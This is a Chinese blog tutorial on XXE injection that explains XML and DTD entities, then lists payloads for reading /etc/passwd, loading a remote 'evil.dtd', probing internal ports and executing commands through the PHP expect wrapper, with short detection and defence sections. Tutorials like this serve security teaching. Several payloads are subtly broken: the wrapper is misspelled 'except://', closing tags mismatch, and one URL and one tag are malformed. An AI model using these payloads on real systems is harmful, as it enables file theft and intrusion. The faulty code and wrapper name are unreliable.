XXE外部实体注入攻击(含XML,DTD详解)

已于 2023-09-19 17:46:40 修改
阅读量448 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: xml web安全 java
于 2023-09-19 17:22:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73180072/article/details/133031882
版权

一、XML介绍

XML文件可以理解为一种可以自己定义标签的HTML文件,所以自己定义标签就需要DTD语法规则来实现,因此一个XML文档一般会有约束自己语法规则的DTD文件或直接写在XML文档内部的关于XML语法的DTD规则说明区。

  • XML 指可扩展标记语言(EXtensible Markup Language)。
  • XML 是一种很像HTML的标记语言。
  • XML 的设计宗旨是传输数据,而不是显示数据。
  • XML 标签没有被预定义。您需要自行定义标签。
  • XML 被设计为具有自我描述性。
  • XML 是 W3C 的推荐标准

 二、DTD介绍

DTD是一套关于标记符的语法规则,你可以简单理解为XML文档的语法规则,它规定着XML文档有哪些标签,它可以写在XML文档内部,也可以与XML文档分开来写为两个文档一个XML文件,再引入外部DTD文件;

DTD内有关于实体定义的语法规则,XXE的漏洞爆发的根源就在于XML文档内关于DTD定义外部实体的部分,简单了解一下实体的概念

三、XXE攻击

接上图说明,在最终可以声明的四种实体中,外部通用实体与外部参数实体由于可以引用了外部的内容,导致了攻击者可以利用此处的引用点进行注入攻击,因此XXE被称为XML外部实体攻击

因此构成XXE攻击需要满足两项条件

1.XML文档引用了DTD的声明外部实体的功能

2.XML文档在接受新的参数后会被服务器重新解析

如果需要满足第一个条件,有三种情况

情况1:XML与DTD编写在同一个XML文档内,DTD声明外部通用实体,且通用实体已经被XML文档或DTD内部引用。

<?xml version="1.0"?>
<!DOCTYPE a [
    <!ENTITY b SYSTEM "file:///etc/passwd">
]>
<C>&b;</c>

 

情况2:XML与DTD编写在同一个XML文档内,DTD声明外部通用实体,该实体也为DTD文件且定义了实体b,通用实体b被XML文档或DTD内部引用。

XML文档内

<?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://mark4z5.com/evil.dtd">
<C>&b;</c>

 evil.dtd文档内

<!ENTITY b SYSTEM "file:///etc/passwd">

 

 情况3:XML与DTD编写在同一个XML文档内,DTD声明外部参数实体d,该实体也为DTD文件且定义了实体b,先在DTD内引用参数实体d,再在XML文档或DTD引用通用实体b。

XML文档内

<!DOCTYPE a [
   <!ENTITY % d SYSTEM "http:/test.com/abc.dtd">
   %d;
]>

<c>&b;</c>

 abc.dtd文档内

<!ENTITY b SYSTEM "file:///etc/passwd" >

 

如果需要满足第二个条件就需要:

检测站点内所有接受XML的点,抓包观察其是否会返回我们想要的内容。

传参处输入payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY words "Hello XXE !">]><root>&words;</root>

观察页面或者返回数据包内是否存在 Hello XXE 字样

四、XXE的检测

方式一

查看提交XML文件的地方

抓包:修改http请求,查看抓取的数据包中是否有提交XML文档,修改提交的XML文档再查看返回包响应,查看应用程序是否解析了修改内容,如果解析了则有可能存在XXE漏洞。

 

方式二

在输入框内或接受XML数据的点输入payload,观察页面或者返回数据包内是否存在 Hello XXE 字样,也就是对于XXE攻击首先看此处是否可以解析XML数据

检测payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY words "Hello XXE !">]><root>&words;</root>

五、 XXE的exp

1.读取本地文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x>&xxe;</x>

2. 探测内网端口

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "http://192.168.31.124:4444/test">
]>
<x>&xxe;</x></r>

成功的话,会返回空白。不成功的话会报错

3.配合php拓展命令执行

如果是 PHP 环境下并安装 except 扩展,就可以利用它执行系统命令了。

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "except://id">
]>
<x>&xxe;</x>

 六、XXE的防御

1. 禁用外部实体的引入,比如:使用libxmldisableentity_loader(true)等方式。

2. 过滤如SYSTEM等敏感关键字,防止非正常、攻击性的外部实体引入操作。

注:创作不易,答主水平菜鸟一只,还望各位客官海涵,如有错误欢迎大佬指正

TIME908
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[ctf web]XXE通过DTD读取文件+XMLDTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
ShenZ的博客
08-23 674
XML基础 XML文件可以分为三部分: XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。 文档元素 <foo><note category="COOKING"></note></foo> 根元素foo,子元素note,属性category XML语法 XML被设计为传输和存储数据 基本语法: - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X
网络安全--XXE漏洞利用思路
jazzz98的博客
05-19 1864
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)
XXE-XML实体注入漏洞
2301_80661529的博客
03-07 1279
DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。
XXE详解
qq_48904485的博客
03-22 5500
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
xxe漏洞(xml外部实体注入漏洞)
xiaoheizi的博客
06-10 444
在知道存在回显后,可以尝试读取一些敏感目录,比如读取c:/windows/win.ini,它是每个windows系统都有的,linux系统的的话可以读取/etc/passwd,当然想要读取其他文件目录,只需更改绝对路径即可(file://协议只能用绝对路径)报错XXE是回显XXE攻击的一种特例,它与正常回显XXE的不同在于它在利用过程中服务器回显的是错误信息,可根据错误信息的不同判断是否注入成功。正常回显XXE是最传统的XXE攻击,在利用过程中服务器会直接回显信息,可直接完成XXE攻击
WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
m0_65336233的博客
10-15 746
WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
XXE(XML External Entity attack)XML外部实体注入攻击
xiaoi123的博客
08-15 2175
导语   XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。   尽管XXE漏洞已经...
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXEXML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
XXE漏洞详解【内vulnhub靶场XXE Lab:1详解
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体XML文档的一部分,允许引用外部资源,如文件系统、网络...
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
XML外部实体注入——XXE漏洞详解
Gefangenes的博客
07-02 2078
首先要了解什么是XXE漏洞,首先应该了解一下什么是XMLXML(可扩展标记语言,英文全称:eXtensible Markup Language)是一种用于描述数据结构和交换数据的标记语言。XML是一种非常灵活的语言,可以用于描述各种类型的数据,如文档、图像、音频、视频等。这个解释太官方,我们可以将xml语言和html对比着再来解释一下1>xml仅仅是纯文本,他不会做任何事情2>xml可以自己发明标签(允许定义自己的标签和文档结构)3>专门用来存放传输数据的东西。
DTD 实体 XXE 浅析
hl1293348082的专栏
03-27 509
在 FIT2018 互联网创新大会上得知,最新的 OWASP top10 中,XXE 已上升至第三位,所有对 XXE 产生了强烈的兴趣。虽然之前也听说过 XXE,但是一直未深入了解。经多方资料查询,愈发感受到 XXE 攻击的强大。 以下是我这段时间对 XXE 学习的一点总结,比较浅显,仅供参考。 0x00 什么是 XXE XXEXML External Entity,即外部实体攻击。要了解 XXE 攻击,需要先了解 XML 相关语法。 XML相关语法 XML 是一种可扩展标记语言,被设计用来传输
【Web安全】XXE漏洞
zkaqlaoniao的博客
11-24 314
XXE漏洞指的是XML外部实体注入XML External Entity Injection)漏洞,它是一种常见的安全漏洞类型,可以用来攻击基于XML的应用程序。当应用程序接受XML输入时,攻击者可以插入带有外部实体引用的恶意XML数据,从而导致应用程序执行未经授权的操作,比如访问本地文件系统、执行远程代码等。攻击者可以通过利用XXE漏洞来获取敏感信息、控制服务器,或者执行其他恶意操作。
用细节阻止外部攻击:深入剖析XXE注入漏洞的XML基础和DTD基础
weixin_43263566的博客
02-05 192
XXE-XML外部实体注入攻击漏洞(XML基础、DTD基础)
网络安全之XXE漏洞总结(pikachu靶场案例解析)
qq_61529962的博客
12-15 504
xxe漏洞原理解析,php靶场案例,pikachu靶场
使用JavaFx Fxml笔记
最新发布
BMG-Princess
07-25 441
stage.setTitle("DR295C数据采集传输仪");
关于xxe外部实体安全
04-27
XXE攻击是指攻击者通过XML实体注入漏洞,向应用程序中注入恶意的XML实体数据,从而导致应用程序解析XML实体时,触发攻击者构造的恶意行为。其中,外部实体注入攻击XXE攻击中最常见的一种方式。 为了防止XXE攻击中的外部实体注入攻击,可以采取以下措施: 1. 禁止使用外部实体:在解析XML数据时,应该禁止使用外部实体。可以在解析XML数据时,设置解析器的属性,禁止使用外部实体。 2. 过滤用户输入:在接收用户输入时,应该对输入数据进行过滤和验证,确保输入数据符合预期的格式和内容。可以使用正则表达式等方法,对用户输入进行限制和过滤。 3. 使用安全的XML解析器:使用安全的XML解析器可以有效地避免XXE攻击。一些安全的XML解析器,如SAX、DOM4J等,在解析XML数据时,会默认禁止使用外部实体。 4. 加强安全审计:及时发现和修复应用程序中的安全漏洞,可以有效地避免XXE攻击的发生。因此,应该加强安全审计工作,定期对应用程序进行安全检测和评估。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值